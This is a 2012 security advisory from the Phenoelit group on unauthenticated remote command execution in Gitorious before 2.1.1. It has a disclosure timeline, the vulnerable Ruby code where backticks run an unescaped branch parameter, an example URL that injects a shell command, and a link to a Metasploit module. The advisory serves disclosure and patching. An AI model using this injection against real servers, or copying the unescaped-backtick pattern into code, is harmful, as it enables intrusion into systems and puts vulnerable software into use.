Phenoelit Advisory <wir-haben-auch-mal-was-gefunden #0815 +--+->
[ Authors ]
joernchen <joernchen () phenoelit de>
Phenoelit Group (http://www.phenoelit.de)
[ Affected Products ]
Gitorious < 2.1.1 (http://gitorious.org)
[ Vendor communication ]
2012-01-16 Asking vendor for PGP key
2012-01-17 Getting PGP key from vendor
2012-01-17 Sending vulnerability details to vendor
2012-01-19 Vendor replies and sends link to patch [0]
2012-01-19 Asking if users will be informed
2012-01-20 Vendor states that they will create a patch and let the users know
2012-01-25 Asking for a timeline for the notification
2012-01-26 Vendor replies that the patched branch is pushed and users are informed via a mailing list.
2012-01-27 Release of this advisory
[ Overview ]
Gitorious is a Git repository management software written in Ruby on Rails.
[ Description ]
Gitorious has been found vulnerable to unauthenticated remote command execution.
The root cause is in gitorious-mainline/lib/gitorious/git_shell.rb:
  def execute(command)
    Timeout.timeout(20) do
      `#{command}`        # backticks hand the string to /bin/sh, so any shell
    end                   # metacharacters in `command` are interpreted
  rescue Timeout::Error
    # ... (remainder of the method elided in the advisory)
  end
called by app/controllers/api/graphs_controller.rb:
  def graph_log(repo, type, branch = nil)
    args = [repo.full_repository_path, "--decorate=full", "-100", type]
    args << desplat_path(branch) if branch   # branch ends up in the command string unescaped
    git_shell.send(:graph_log, *args)
  end
where branch is user controlled via the route:
  api.connect ':project_id/:repository_id/log/graph/*branch',
              :controller => 'graphs', :action => 'show'
[ Example ]
http://gitorious.site/project/repo/log/graph/`id>/tmp/command_exec`
For convenient use of this feature, have a look at [1].
[ Solution ]
Update to version 2.1.1
[ References ]
[0] https://gitorious.org/gitorious/mainline/commit/647aed91a4dc72e88a27476948dfbacd5d0bf7ce
[1] http://metasploit.com/modules/exploit/multi/http/gitorious_graph
[ end of file ]